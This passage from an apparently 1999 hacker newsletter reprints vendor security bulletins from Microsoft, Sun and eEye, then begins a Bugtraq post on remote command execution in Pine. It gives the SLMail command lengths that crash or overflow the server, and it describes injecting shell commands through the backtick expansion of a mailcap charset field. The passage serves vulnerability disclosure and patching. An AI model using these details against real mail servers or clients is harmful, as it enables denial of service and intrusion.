  2710.          /fixes/usa/NT40/hotfixes-postSP4/Msv1-fix/msv-fixi.exe
  2711.       - Fix for Alpha version:
  2712.          ftp://ftp.microsoft.com/bussys/winnt/winnt-public
  2713.          /fixes/usa/NT40/hotfixes-postSP4/Msv1-fix/msv-fixa.exe
  2714.       
  2715.       What Customers Should Do
  2716.       ========================
  2717.       The patch for this vulnerability is fully supported, and Microsoft
  2718.       recommends that all affected customers apply it. The URLs for the patch are
  2719.       provided above in What Microsoft is Doing.
  2720.       
  2721.       More Information
  2722.       ================
  2723.       Please see the following references for more information related to this
  2724.       issue.
  2725.       - Microsoft Security Bulletin MS99-004,
  2726.          Patch Available for Authentication Processing
  2727.          Error in Windows NT 4.0 Service Pack 4 (the
  2728.          Web-posted version of this bulletin),
  2729.          http://www.microsoft.com/security/bulletins/ms99-004.asp.
  2730.       - Microsoft Knowledge Base (KB) article Q214840,
  2731.          MSV1_0 Incorrectly Allows Network Connections for
  2732.          Specific Accounts.
  2733.          http://support.microsoft.com/support/kb/articles/q214/8/40.asp
  2734.          (Note: It might take 24 hours from the original posting
  2735.          of this bulletin for the KB article to be visible in the
  2736.          Web-based Knowledge Base.)
  2737.       
  2738.  
  2739.       Acknowledgements
  2740.       ================
  2741.       Microsoft wishes to acknowledge Harry Johnston, School of Computing and
  2742.       Mathematical Sciences, University of Waikato, New Zealand, for discovering
  2743.       this vulnerability and reporting it to us.
  2744.       
  2745.       Obtaining Support on this Issue
  2746.       ===============================
  2747.       This is a supported patch. If you have problems installing
  2748.       this patch or require technical assistance with this patch,
  2749.       please contact Microsoft Technical Support. For information
  2750.       on contacting Microsoft Technical Support, please see
  2751.       
  2752. http://support.microsoft.com/support/contact/default.asp.
  2753.       
  2754.       Revisions
  2755.       =========
  2756.       - February 8, 1999: Bulletin Created
  2757.       
  2758.       For additional security-related information about Microsoft
  2759.       products, please visit http://www.microsoft.com/security
  2760.       
  2761.       -----------------------------------------------------------
  2762.       
  2763.       THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
  2764.       WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
  2765.       EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
  2766.       FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
  2767.       SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
  2768.       INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
  2769.       IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
  2770.       POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
  2771.       LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
  2772.       FOREGOING LIMITATION MAY NOT APPLY.
  2773.       
  2774.       (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
  2775.       
  2776.          *******************************************************************
  2777.       You have received  this e-mail bulletin as a result  of your registration
  2778.       to  the   Microsoft  Product  Security  Notification   Service.  You  may
  2779.       unsubscribe from this e-mail notification  service at any time by sending
  2780.       an  e-mail  to  MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
  2781.       The subject line and message body are not used in processing the request,
  2782.       and can be anything you like.
  2783.       
  2784.       For  more  information on  the  Microsoft  Security Notification  Service
  2785.       please    visit    http://www.microsoft.com/security/bulletin.htm.    For
  2786.       security-related information  about Microsoft products, please  visit the
  2787.       Microsoft Security Advisor web site at http://www.microsoft.com/security.
  2788.      
  2789.      @HWA
  2790.      
  2791.   5.1  Sun security advisories   
  2792.        ~~~~~~~~~~~~~~~~~~~~~~~ 
  2793.        
  2794.        { Sorry but the excess crap has been left in these advisories to keep the
  2795.        legal people happy. - Ed }
  2796.        
  2797.         Date: Wed, 10 Feb 1999 11:24:01 -0800
  2798.         From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team)
  2799.         Message-Id: <199902101924.LAA25198@sunsc.eng.sun.com>
  2800.         To: CWS@sunsc.Eng.Sun.COM
  2801.         X-Sun-Charset: US-ASCII
  2802.         Subject: Sun Security Bulletin #00183
  2803.         
  2804.         -----BEGIN PGP SIGNED MESSAGE-----
  2805.         
  2806.         ________________________________________________________________________________
  2807.                    Sun Microsystems, Inc. Security Bulletin
  2808.                 
  2809.         Bulletin Number:    #00183
  2810.         Date:             February 10, 1999
  2811.         
  2812. Cross-Ref:        
  2813.         Title:            sdtcm_convert
  2814.         ________________________________________________________________________________
  2815.         
  2816.         The information contained in this Security Bulletin is provided "AS IS." 
  2817.         Sun makes no warranties of any kind whatsoever with respect to the information 
  2818.         contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, 
  2819.         REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR 
  2820.         IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE 
  2821.         HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
  2822.         
  2823.         IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, 
  2824.         PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL 
  2825.         OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY 
  2826.         ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN 
  2827.         THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF 
  2828.         THE POSSIBILITY OF SUCH DAMAGES.
  2829.         
  2830.         If any of the above provisions are held to be in violation of applicable law, 
  2831.         void, or unenforceable in any jurisdiction, then such provisions are waived 
  2832.         to the extent necessary for this disclaimer to be otherwise enforceable in 
  2833.         such jurisdiction.
  2834.         ________________________________________________________________________________
  2835.         
  2836.         1.  Background
  2837.         
  2838.             sdtcm_convert is a setuid-root calendar data conversion utility which
  2839.             converts version 3 (OpenWindows) calendar data format to version 4 
  2840.             (extensible calendar data format), and vice versa. A buffer overflow
  2841.             has been discovered which may be exploited to gain root access.  
  2842.         
  2843.         2.  Affected Supported Versions
  2844.                 
  2845.             Solaris(tm) versions:   7, 7_x86, 2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,
  2846.                                     2.5_x86, 2.4 and 2.4_x86 running CDE
  2847.                            
  2848.         3.  Recommendations
  2849.         
  2850.             Sun recommends that you install the respective patches immediately
  2851.             on affected systems.
  2852.             
  2853.             CDE Version        Patch ID        
  2854.             ___________        _________ 
  2855.             1.3                 107022-01
  2856.             1.3_x86             107023-01
  2857.             1.2                 105566-06
  2858.             1.2_x86             105567-07
  2859.             1.0.2               103670-06
  2860.             1.0.2_x86           103717-06
  2861.             1.0.1               103671-06
  2862.             1.0.1_x86           103718-06
  2863.         
  2864.         _______________________________________________________________________________
  2865.         APPENDICES
  2866.         
  2867.         A.  Patches listed in this bulletin are available to all Sun customers via 
  2868.             World Wide Web at:
  2869.             
  2870.                 <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
  2871.         
  2872.         B.  Checksums for the patches listed in this bulletin are available via 
  2873.             World Wide Web at:
  2874.         
  2875.                 <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
  2876.         
  2877.         C.  Sun security bulletins are available via World Wide Web at:
  2878.         
  2879.             <URL:http://sunsolve.sun.com/sunsolve/secbulletins>
  2880.             
  2881.         D.  Sun Security Coordination Team's PGP key is available via World Wide Web 
  2882.             at:
  2883.         
  2884.             <URL:http://sunsolve.sun.com/sunsolve/secbulletins/SunSCkey.txt>
  2885.                                     
  2886.         E.  To report or inquire about a security problem with Sun software, contact 
  2887.             one or more of the following:
  2888.           
  2889.                 - Your local Sun answer centers
  2890.                 - Your representative computer security response team, such as CERT 
  2891.                 - Sun Security Coordination Team. Send email to:
  2892.             
  2893.                      security-alert@sun.com
  2894.         
  2895.         F.  To receive information or subscribe to our CWS (Customer Warning System) 
  2896.             mailing list, send email to:
  2897.             
  2898.                     security-alert@sun.com
  2899.            
  2900.             with a subject line (not body) containing one of the following commands:
  2901.         
  2902.                 Command         Information Returned/Action Taken
  2903.                 _______         _________________________________
  2904.         
  2905.                 help            An explanation of how to get information
  2906.                 
  2907.                 key             Sun Security Coordination Team's PGP key
  2908.             
  2909.                 list            A list of current security topics
  2910.         
  2911.                 query [topic]   The email is treated as an inquiry and is forwarded to 
  2912.                                 the Security Coordination Team
  2913.         
  2914.                 report [topic]  The email is treated as a security report and is
  2915.                                 forwarded to the Security Coordination Team. Please 
  2916.                                 encrypt sensitive mail using Sun Security Coordination
  2917.                                 Team's PGP key
  2918.         
  2919.                 send topic      A short status summary or bulletin. For example, to 
  2920.                                 retrieve a Security Bulletin #00138, supply the 
  2921.                                 following in the subject line (not body):
  2922.                         
  2923.                                         send #138
  2924.         
  2925.                 subscribe       Sender is added to our mailing list.  To subscribe, 
  2926.                                 supply the following in the subject line (not body):
  2927.         
  2928.                                         subscribe cws your-email-address
  2929.                     
  2930.                                 Note that your-email-address should be substituted
  2931.                                 by your email address.
  2932.                     
  2933.                 unsubscribe     Sender is removed from the CWS mailing list.
  2934.         ________________________________________________________________________________
  2935.         
  2936.         Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, 
  2937.         Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks 
  2938.         of Sun Microsystems, Inc. in the United States and other countries. This 
  2939.         Security Bulletin may be reproduced and distributed, provided that this 
  2940.         Security Bulletin is not modified in any way and is attributed to 
  2941.         Sun Microsystems, Inc. and provided that such reproduction and distribution 
  2942.         is performed for non-commercial purposes.
  2943.         
  2944.         
  2945.         
  2946.         -----BEGIN PGP SIGNATURE-----
  2947.         Version: 2.6.2
  2948.         
  2949.         iQCVAwUBNsDNl7dzzzOFBFjJAQHCzAQAgcHETSfA5CrYudnSZues30KRififcbhB
  2950.         FIKBKhAh/Tec7pa0sg9nvTjGPTcTpMPPyj2asxM9KXsxLTKILt8EuoLy3QWdc+qr
  2951.         Tu0pVIcQ/PIBaUXpGMvABS1tVf13tWUIcvZ6yaj08cELV4O6X7K8dbbEXXGfLPtK
  2952.         fSyVXp5ktPo=
  2953.         =B8vf
  2954.         -----END PGP SIGNATURE-----
  2955.         
  2956.         
  2957.         Date: Wed, 10 Feb 1999 12:01:07 -0800
  2958.         From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team)
  2959.         Message-Id: <199902102001.MAA25280@sunsc.eng.sun.com>
  2960.         To: CWS@sunsc.Eng.Sun.COM
  2961.         Subject: Sun Security Bulletin #00184
  2962.         X-Sun-Charset: US-ASCII
  2963.         
  2964.         -----BEGIN PGP SIGNED MESSAGE-----
  2965.         
  2966.         ________________________________________________________________________________
  2967.                    Sun Microsystems, Inc. Security Bulletin
  2968.                 
  2969.         Bulletin Number:    #00184
  2970.         Date:             February 10, 1999
  2971.         Cross-Ref:        
  2972.         Title:            man/catman
  2973.         ________________________________________________________________________________
  2974.         
  2975.         The information contained in this Security Bulletin is provided "AS IS." 
  2976.         Sun makes no warranties of any kind whatsoever with respect to the information 
  2977.         contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, 
  2978.         REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR 
  2979.         IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE 
  2980.         HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
  2981.         
  2982.         IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, 
  2983.         PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL 
  2984.         OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY 
  2985.         ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN 
  2986.         THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF 
  2987.         THE POSSIBILITY OF SUCH DAMAGES.
  2988.         
  2989.         If any of the above provisions are held to be in violation of applicable law, 
  2990.         void, or unenforceable in any jurisdiction, then such provisions are waived 
  2991.         to the extent necessary for this disclaimer to be otherwise enforceable in 
  2992.         such jurisdiction.
  2993.         ________________________________________________________________________________
  2994.         
  2995.         1.  Background
  2996.         
  2997.             The man command displays information from the reference manuals. The
  2998.             catman utility creates preformatted versions of the on-line manuals.
  2999.             Vulnerabilities have been discovered with these commands that may be
  3000.             exploited to overwrite arbitrary files when man or catman is executed
  3001.             by root.
  3002.             
  3003.         2.  Affected Supported Versions
  3004.                 
  3005.             Solaris(tm) versions:   7, 7_x86, 2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,
  3006.                                     2.5_x86, 2.4, 2.4_x86, and 2.3
  3007.                                     
  3008.             SunOS(tm) versions:     4.1.4 and 4.1.3_U1 
  3009.                            
  3010.         3.  Recommendations
  3011.         
  3012.             Sun recommends that you install the respective patches immediately
  3013.             on affected systems.
  3014.             
  3015.             Operating System    Patch ID    
  3016.             _________________   _________    
  3017.             Solaris 7           107038-01        
  3018.             Solaris 7_x86       107039-01
  3019.             Solaris 2.6         106123-04        
  3020.             Solaris 2.6_x86     106124-04
  3021.             Solaris 2.5.1       106905-01
  3022.             Solaris 2.5.1_x86   106906-01
  3023.             Solaris 2.5         106907-01
  3024.             Solaris 2.5_x86     106908-01
  3025.             Solaris 2.4         106912-01
  3026.             Solaris 2.4_x86     106962-01
  3027.             Solaris 2.3         106911-01
  3028.             SunOS   4.1.4    107157-01
  3029.                                 107144-01
  3030.             SunOS   4.1.3_U1    107156-01
  3031.                                 107143-01
  3032.                                 
  3033.         _______________________________________________________________________________
  3034.         APPENDICES
  3035.         
  3036.         A.  Patches listed in this bulletin are available to all Sun customers via 
  3037.             World Wide Web at:
  3038.             
  3039.                 <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
  3040.         
  3041.         B.  Checksums for the patches listed in this bulletin are available via 
  3042.             World Wide Web at:
  3043.         
  3044.                 <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
  3045.         
  3046.         C.  Sun security bulletins are available via World Wide Web at:
  3047.         
  3048.             <URL:http://sunsolve.sun.com/sunsolve/secbulletins>
  3049.             
  3050.         D.  Sun Security Coordination Team's PGP key is available via World Wide Web 
  3051.             at:
  3052.         
  3053.             <URL:http://sunsolve.sun.com/sunsolve/secbulletins/SunSCkey.txt>
  3054.                                     
  3055.         E.  To report or inquire about a security problem with Sun software, contact 
  3056.             one or more of the following:
  3057.           
  3058.                 - Your local Sun answer centers
  3059.                 - Your representative computer security response team, such as CERT 
  3060.                 - Sun Security Coordination Team. Send email to:
  3061.             
  3062.                      security-alert@sun.com
  3063.         
  3064.         F.  To receive information or subscribe to our CWS (Customer Warning System) 
  3065.             mailing list, send email to:
  3066.             
  3067.                     security-alert@sun.com
  3068.            
  3069.             with a subject line (not body) containing one of the following commands:
  3070.         
  3071.                 Command         Information Returned/Action Taken
  3072.                 _______         _________________________________
  3073.         
  3074.                 help            An explanation of how to get information
  3075.                 
  3076.                 key             Sun Security Coordination Team's PGP key
  3077.             
  3078.                 list            A list of current security topics
  3079.         
  3080.                 query [topic]   The email is treated as an inquiry and is forwarded to 
  3081.                                 the Security Coordination Team
  3082.         
  3083.                 report [topic]  The email is treated as a security report and is
  3084.                                 forwarded to the Security Coordination Team. Please 
  3085.                                 encrypt sensitive mail using Sun Security Coordination
  3086.                                 Team's PGP key
  3087.         
  3088.                 send topic      A short status summary or bulletin. For example, to 
  3089.                                 retrieve a Security Bulletin #00138, supply the 
  3090.                                 following in the subject line (not body):
  3091.                         
  3092.                                         send #138
  3093.         
  3094.                 subscribe       Sender is added to our mailing list.  To subscribe, 
  3095.                                 supply the following in the subject line (not body):
  3096.         
  3097.                                         subscribe cws your-email-address
  3098.                     
  3099.                                 Note that your-email-address should be substituted
  3100.                                 by your email address.
  3101.                     
  3102.                 unsubscribe     Sender is removed from the CWS mailing list.
  3103.         ________________________________________________________________________________
  3104.         
  3105.         Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, 
  3106.         Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks 
  3107.         of Sun Microsystems, Inc. in the United States and other countries. This 
  3108.         Security Bulletin may be reproduced and distributed, provided that this 
  3109.         Security Bulletin is not modified in any way and is attributed to 
  3110.         Sun Microsystems, Inc. and provided that such reproduction and distribution 
  3111.         is performed for non-commercial purposes.
  3112.         
  3113.         
  3114.         
  3115.         -----BEGIN PGP SIGNATURE-----
  3116.         Version: 2.6.2
  3117.         
  3118.         iQCVAwUBNsDNq7dzzzOFBFjJAQEW2AQAhwzM5IgjrTmjzxu9NbheZ8cGH2xtiLId
  3119.         At89187MXvjXuTw44HUiulBQtJoKYdhf9yiU+n0BtUAUpRsXMtu/mtOkwajMAzRi
  3120.         
  3121. lZ+Js93s1x3o6GY8qy+jbl4m7zLLrzRx6V+T+DwjWFVZ5RfW+57MEgEx3kTgCEzt
  3122.         c+KlX2EGnP0=
  3123.         =XsT5
  3124.         -----END PGP SIGNATURE-----
  3125.  
  3126.         
  3127.         Date: Wed, 10 Feb 1999 12:01:34 -0800
  3128.         From: secure@sunsc.Eng.Sun.COM (Sun Security Coordination Team)
  3129.         Message-Id: <199902102001.MAA25297@sunsc.eng.sun.com>
  3130.         To: CWS@sunsc.Eng.Sun.COM
  3131.         Subject: Sun Security Bulletin #00185
  3132.         X-Sun-Charset: US-ASCII
  3133.         
  3134.         -----BEGIN PGP SIGNED MESSAGE-----
  3135.         
  3136.         ________________________________________________________________________________
  3137.                    Sun Microsystems, Inc. Security Bulletin
  3138.                 
  3139.         Bulletin Number:    #00185
  3140.         Date:             February 10, 1999
  3141.         
  3142. Cross-Ref:        CERT CA-98.02
  3143.         Title:            Common Desktop Environment (CDE)
  3144.         ________________________________________________________________________________
  3145.         
  3146.         The information contained in this Security Bulletin is provided "AS IS." 
  3147.         Sun makes no warranties of any kind whatsoever with respect to the information 
  3148.         contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, 
  3149.         REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR 
  3150.         IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE 
  3151.         HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
  3152.         
  3153.         IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, 
  3154.         PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL 
  3155.         OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY 
  3156.         ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN 
  3157.         THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF 
  3158.         THE POSSIBILITY OF SUCH DAMAGES.
  3159.         
  3160.         If any of the above provisions are held to be in violation of applicable law, 
  3161.         void, or unenforceable in any jurisdiction, then such provisions are waived 
  3162.         to the extent necessary for this disclaimer to be otherwise enforceable in 
  3163.         such jurisdiction.
  3164.         ________________________________________________________________________________
  3165.         
  3166.         1.  Background
  3167.         
  3168.             Several vulnerabilities in the Common Desktop Environment (CDE) may be
  3169.             be exploited to gain root access and remove arbitrary files.
  3170.         
  3171.         2.  Affected Supported Versions
  3172.                 
  3173.             Solaris(tm) versions:   2.6, 2.6_x86, 2.5.1, 2.5.1_x86, 2.5,
  3174.                                     2.5_x86, 2.4 and 2.4_x86 running CDE
  3175.                                     
  3176.             Solaris 7 is not affected.              
  3177.                            
  3178.         3.  Recommendations
  3179.         
  3180.             Sun recommends that you install the respective patches immediately
  3181.             on affected systems.
  3182.             
  3183.             CDE Version         Patch ID        
  3184.             ___________         _________ 
  3185.             1.2            106112-03
  3186.                         105837-02
  3187.             1.2_x86        106113-03 
  3188.                             105838-02
  3189.             1.0.2        104661-07
  3190.                         104498-05
  3191.                         103882-09
  3192.             1.0.2_x86        104663-08
  3193.                           104500-05
  3194.                           103886-08
  3195.             1.0.1        104660-04
  3196.                         104497-05
  3197.                         103884-07
  3198.             1.0.1_x86        104662-05
  3199.                         104499-05
  3200.                         103885-07
  3201.               
  3202.         _______________________________________________________________________________
  3203.         APPENDICES
  3204.         
  3205.         A.  Patches listed in this bulletin are available to all Sun customers via 
  3206.             World Wide Web at:
  3207.             
  3208.                 <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
  3209.         
  3210.         B.  Checksums for the patches listed in this bulletin are available via 
  3211.             World Wide Web at:
  3212.         
  3213.                 <URL:http://sunsolve.sun.com/sunsolve/pubpatches/patches.html>
  3214.         
  3215.         C.  Sun security bulletins are available via World Wide Web at:
  3216.         
  3217.             <URL:http://sunsolve.sun.com/sunsolve/secbulletins>
  3218.             
  3219.         D.  Sun Security Coordination Team's PGP key is available via World Wide Web 
  3220.             at:
  3221.         
  3222.             <URL:http://sunsolve.sun.com/sunsolve/secbulletins/SunSCkey.txt>
  3223.                                     
  3224.         E.  To report or inquire about a security problem with Sun software, contact 
  3225.             one or more of the following:
  3226.           
  3227.                 - Your local Sun answer centers
  3228.                 - Your representative computer security response team, such as CERT 
  3229.                 - Sun Security Coordination Team. Send email to:
  3230.             
  3231.                      security-alert@sun.com
  3232.         
  3233.         F.  To receive information or subscribe to our CWS (Customer Warning System) 
  3234.             mailing list, send email to:
  3235.             
  3236.                     security-alert@sun.com
  3237.            
  3238.             with a subject line (not body) containing one of the following commands:
  3239.         
  3240.                 Command         Information Returned/Action Taken
  3241.                 _______         _________________________________
  3242.         
  3243.                 help            An explanation of how to get information
  3244.                 
  3245.                 key             Sun Security Coordination Team's PGP key
  3246.             
  3247.                 list            A list of current security topics
  3248.         
  3249.                 query [topic]   The email is treated as an inquiry and is forwarded to 
  3250.                                 the Security Coordination Team
  3251.         
  3252.                 report [topic]  The email is treated as a security report and is
  3253.                                 forwarded to the Security Coordination Team. Please 
  3254.                                 encrypt sensitive mail using Sun Security Coordination
  3255.                                 Team's PGP key
  3256.         
  3257.                 send topic      A short status summary or bulletin. For example, to 
  3258.                                 retrieve a Security Bulletin #00138, supply the 
  3259.                                 following in the subject line (not body):
  3260.                         
  3261.                                         send #138
  3262.         
  3263.                 subscribe       Sender is added to our mailing list.  To subscribe, 
  3264.                                 supply the following in the subject line (not body):
  3265.         
  3266.                                         subscribe cws your-email-address
  3267.                     
  3268.                                 Note that your-email-address should be substituted
  3269.                                 by your email address.
  3270.                     
  3271.                 unsubscribe     Sender is removed from the CWS mailing list.
  3272.         ________________________________________________________________________________
  3273.         
  3274.         Copyright 1999 Sun Microsystems, Inc. All rights reserved. Sun, 
  3275.         Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks 
  3276.         of Sun Microsystems, Inc. in the United States and other countries. This 
  3277.         Security Bulletin may be reproduced and distributed, provided that this 
  3278.         Security Bulletin is not modified in any way and is attributed to 
  3279.         Sun Microsystems, Inc. and provided that such reproduction and distribution 
  3280.         is performed for non-commercial purposes.
  3281.         
  3282.         
  3283.         
  3284.         -----BEGIN PGP SIGNATURE-----
  3285.         Version: 2.6.2
  3286.         
  3287.         iQCVAwUBNsDNu7dzzzOFBFjJAQGpVgQApC+yMuvC1Nr7GprSaZl0mzMUQjz1iOba
  3288.         AzDYjksWY5iL+k/aDMuItJ9v/0TGSU7uQkxx64klQjqSmLRD3WZX51c4s9+VppFa
  3289.         V/Y4cf8h2woEenQM8wVwrg2S0rbOTFllnwB3UhT8LkhTC4Qeno8W8TEVTpQOwvhg
  3290.         lhPafl3ka/8=
  3291.         =Ub3k
  3292.         -----END PGP SIGNATURE-----
  3293.  
  3294.  
  3295.   5.2  eEYe security advisories - Feb 1999
  3296.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3297.        ________________________________________________________________________
  3298.  
  3299.        eEye Digital Security Team <e>
  3300.        www.eEye.com
  3301.        info@eEye.com
  3302.        February 04, 1999
  3303.        ________________________________________________________________________
  3304.        
  3305.        Multiple SLMail Vulnerabilities
  3306.        
  3307.        Systems Affected
  3308.        SLMail 3.1
  3309.        
  3310.        Release Date
  3311.        February 04, 1999
  3312.        
  3313.        Advisory Code
  3314.        AD02041999
  3315.        
  3316.        ________________________________________________________________________
  3317.        
  3318.        Description:
  3319.        ________________________________________________________________________
  3320.        
  3321.        We were once again grinding software through Retina Alpha code and have
  3322.        found the following.
  3323.        
  3324.        One of the ports that SLMail's POP Service listens on is port 27. It
  3325.        provides ESMTP functionality. The only difference between it and SLMail's
  3326.        SMTP service is that port 27 provides the "turn" functions. All
  3327.        vulnerabilities are based off of the port 27 service.
  3328.        
  3329.        The first vulnerability involves the "helo" command. There are two
  3330.        vulnerabilities within it. The first is sending "helo" followed by 819 to
  3331.        849 characters. This will send the servers CPU to idle around 90%.
  3332.        
  3333.        The second vulnerability in the "helo" command is a buffer overflow. If you
  3334.        issue "helo" followed by 855 to 2041 characters the server will crash with
  3335.        your typical overflow error.
  3336.        
  3337.        The second set of vulnerabilities are with the "vrfy" and "expn" commands.
  3338.        We have not tested to find the start and stop string lengths but sending
  3339.        "vrfy" or "expn" with 2041 characters will cause the SLMail.exe to exit
  3340.        itself.
  3341.        
  3342.        So we can either send the CPU to 90%, overflow some buffers, or have the
  3343.        server exit without a trace. Take your pick.
  3344.        
  3345.        ________________________________________________________________________
  3346.        
  3347.        Vendor Status
  3348.        ________________________________________________________________________
  3349.        
  3350.        We gave SeattleLabs a week. We have no reply so far. Contact them directly
  3351.        and maybe they will respond.
  3352.        
  3353.        ________________________________________________________________________
  3354.        
  3355.        Copyright (c) 1999 eEye Digital Security Team
  3356.        ________________________________________________________________________
  3357.        
  3358.        Permission is hereby granted for the redistribution of this alert
  3359.        electronically. It is not to be edited in any way without express consent of
  3360.        eEye. If you wish to reprint the whole or any part of this alert in any
  3361.        other medium excluding electronic medium, please e-mail alert@eEye.com for
  3362.        permission.
  3363.        
  3364.        ________________________________________________________________________
  3365.        
  3366.        Disclaimer:
  3367.        ________________________________________________________________________
  3368.        
  3369.        The information within this paper may change without notice. Use of this
  3370.        information constitutes acceptance for use in an AS IS condition. There are
  3371.        NO warranties with regard to this information. In no event shall the author
  3372.        be liable for any damages whatsoever arising out of or in connection with
  3373.        the use or spread of this information. Any use of this information is at the
  3374.        user's own risk.
  3375.        
  3376.        Please send suggestions, updates, and comments to:
  3377.        eEye Digital Security Team
  3378.        info@eEye.com
  3379.        http://www.eEye.com
  3380.        
  3381.        Vendor response:
  3382.        
  3383.        Approved-By: Russ.Cooper@RC.ON.CA
  3384.        Date:         Thu, 4 Feb 1999 23:58:24 GMT
  3385.        Reply-To: lt@seattlelab.com
  3386.        Sender: Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
  3387.        From: Lee Thompson <lt@seattlelab.com>
  3388.        Subject:      Multiple SLMail Vulnerabilities
  3389.        To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  3390.        
  3391.        We are working on a fix and will be including it in our SLmail 3.2 maintenance
  3392.        release.
  3393.        
  3394.        
  3395.        _
  3396.        Lee Thompson                       lt@seattlelab.com
  3397.        Seattle Lab Inc.           http://www.seattlelab.com
  3398.        Product Manager
  3399.  
  3400.     
  3401.        @HWA
  3402.        
  3403.   6.0  Arbitrary command execution in Pine in latest release
  3404.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3405.               
  3406.        Date: Mon, 8 Feb 1999 00:22:17 +0100
  3407.        From: Michal Zalewski <lcamtuf@IDS.PL>
  3408.        To: BUGTRAQ@netspace.org
  3409.        Subject: remote exploit on pine 4.10 - neverending story?
  3410.        
  3411.        Affected systems:
  3412.        -----------------
  3413.        
  3414.          Any Un*x system running 'pine' up to version 4.10 (latest).
  3415.        
  3416.        Compromise:
  3417.        -----------
  3418.        
  3419.          Remote execution of arbitrary code when message is viewed.
  3420.        
  3421.        Details:
  3422.        --------
  3423.        
  3424.          About five months ago, I reported vunerability in metamail package used
  3425.          with pine. I also noticed that '`' character is incorrectly expanded by
  3426.          pine. Problem has been ignored (probably noone understood what I am
  3427.          talking about?;-). But no matter. An exception from /etc/mailcap:
  3428.        
  3429.          text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
  3430.          '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput
  3431.        
  3432.        Impact:
  3433.        -------
  3434.        
  3435.          And now, ladies and gentelmen - my old bug, reinvented. Usually, above
  3436.          mailcap line is expanded to:
  3437.        
  3438.          [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
  3439.                '[a-z]'`" = iso-8859-1)
  3440.        
  3441.          Hmm, but take a look at this message:
  3442.        
  3443.        ************************** MIME MESSAGE FOLLOWS **************************
  3444.        >From: Attacker <attacker@eleet.net>
  3445.        To: Victim <victim@somewhere.net>
  3446.        Subject: Happy birthday
  3447.        ...
